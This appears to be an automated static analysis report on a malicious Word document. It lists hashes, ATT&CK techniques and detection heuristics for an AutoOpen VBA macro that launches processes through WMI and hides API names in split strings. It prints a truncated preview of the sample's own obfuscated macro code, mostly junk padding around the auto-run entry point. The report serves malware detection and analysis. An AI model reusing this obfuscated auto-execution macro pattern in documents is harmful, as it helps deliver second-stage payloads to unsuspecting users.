Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ca6f15f7b6e3f9cc…

MALICIOUS

Office (OLE)

Size: 139.4 KB
Created: 2019-05-03 12:46:00
Authoring application: Microsoft Office Word
First seen: 2020-01-07
MD5: 214ff8cf0d914b74bfdc5fc771be8cfa
SHA-1: 494eaf3a292506386b97145abd6e541227968555
SHA-256: ca6f15f7b6e3f9ccc958aeb6f5adb5b262b5fb1237c3f93d4b12bf102e413447
Risk Score: 302

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32

This Office document contains a high-confidence detection for VBA macros, specifically an AutoOpen macro that utilizes GetObject and CreateObject to launch the Win32_Process.Create method via WMI. The script also shows obfuscation by splitting the 'winmgmts:' string. This indicates the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload.

Heuristics (8)

  • ClamAV: Doc.Malware.Sagent-6961489-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6961489-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8957 bytes
SHA-256: dee0424136e9ece7f100919393e002b15d6858d55de6b70c8aee377ba70892c8

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "i4775_1"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "t870371"
Attribute VB_Base = "0{7A24E517-5945-4E44-BA2E-D83EB7FB6510}{3083BCAC-3F02-4E1B-93B3-7A3A08A25229}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "q195028"

Attribute VB_Name = "i95407"

Attribute VB_Name = "r105375"

Attribute VB_Name = "h_82006"
Attribute VB_Base = "0{BA76CE68-1E81-4F53-92DB-EB08601CFE07}{663FFD15-E62F-4983-A8A7-3C74811A86AB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "P829996"
Function h23_29(X08110_5)
   With l83639
'.u0185198 = (Log(E7810677) + 143575590 * L90255)
'.w33213 = (Log(a980813) + 644438578 * j83_6869)
'.I7_857 = (Log(r6705_19) + 456622172 * H733599)
'.m77475 = (Log(r1620695) + 363532037 * S08324)
End With
   With J_715__7
'.K0457315 = (Log(T673832) + 512454582 * b346405)
'.d4363410 = (Log(X51725) + 816329316 * d27738)
'.c02995 = (Log(Q2_5084) + 584561268 * z673266)
'.n_9190 = (Log(E468161) + 794594767 * w3_91499)
End With
   With S60783_4
'.M66661 = (Log(B__543) + 150566433 * f4_086_)
'.O37636 = (Log(p4110293) + 615561529 * E852_13)
'.L7_615 = (Log(d6961550) + 879755822 * H371_544)
'.h6__28 = (Log(a155982) + 815641020 * R_4166)
End With
Set h23_29 = CVar(X08110_5)
   With u60_7025
'.V72697_3 = (Log(A_3__283) + 386936509 * N76_03)
'.M4841426 = (Log(t322__5) + 303132629 * J788492_)
'.u5_3964 = (Log(j08386) + 435712841 * j77673)
'.i1_432_ = (Log(Z405679) + 151380712 * b5_2_9)
End With
   With C2920__
'.o7_952_ = (Log(C400773) + 993230100 * I62029)
'.H0015_ = (Log(A47027) + 697335416 * m82138)
'.B61890_2 = (Log(R610_547) + 825492041 * w699042)
'.z32356 = (Log(N678305) + 872613838 * k9880451)
End With
End Function
Sub autoopen()
On Error Resume Next
   With l037_502
'.R44428 = (Log(P68_7685) + 405846352 * X3162__)
'.n8067559 = (Log(S47897) + 6016402 * j07431)
'.P93522 = (Log(d7342206) + 102557616 * r64_2_)
'.F2575051 = (Log(w23482_9) + 652790702 * z1360_6)
End With
   With S9952047
'.D72_2675 = (Log(s3937856) + 612120789 * H06198)
'.k79948_4 = (Log(r7035_0) + 137596869 * z18660)
'.j0494674 = (Log(Z7841_9) + 55895129 * T62702_8)
'.O59276 = (Log(O57205) + 643625693 * f_98681)
End With
   With U53303
'.m0191_ = (Log(v_0479_) + 417481928 * D52502)
'.G85233 = (Log(A312__8) + 648569143 * H_52019)
'.V_4_00_9 = (Log(q97729) + 774758285 * K196_310)
'.r5466468 = (Log(M13167) + 838249951 * P418168)
End With
Call E0484000
   With u_88__4
'.Z_6359 = (Log(v657_745) + 77999753 * d346512)
'.B8359636 = (Log(G0622_) + 288489601 * r558460)
'.X124_2 = (Log(R19549) + 155639836 * h1226239)
'.i_00_61 = (Log(z0_53_) + 649181350 * A68395)
End With
   With s_399863
'.Y02_033 = (Log(h020456) + 322164306 * p259534)
'.v8542_90 = (Log(w95_7_4) + 405072418 * u48676)
'.I99756 = (Log(M6_0773_) + 92469226 * H092089)
'.z097888 = (Log(S5_6799) + 437291550 * R195_21)
End With
   With C_0_6_93
'.H_985192 = (Log(m43781) + 795427723 * u78_1849)
'.J9073_4 = (Log(f736295) + 800426904 * f967423)
'.n12478 = (Log(s918493) + 8363732 * G6270457)
'.J75_6357 = (Log(j94471) + 890462035 * z47_52)
End With
End Sub

Attribute VB_Name = "K0_112"
Function E0484000()
On Error Resume Next
   With G214862
'.b547814 = (Log(Y7198282) + 42574356 * i_71032_)
'.q5659460 = (Log(S2__274) + 454186019 * J8201793)
'.w48_827 = (Log(q236756_) + 665420251 * z89692)
'.O364226 = (Log(A3_1075) + 563093067 * c67723)
End With
   With i22701
'.M482_6 = (Log(r790_929) + 832142048 * K23_231)
'
... (truncated)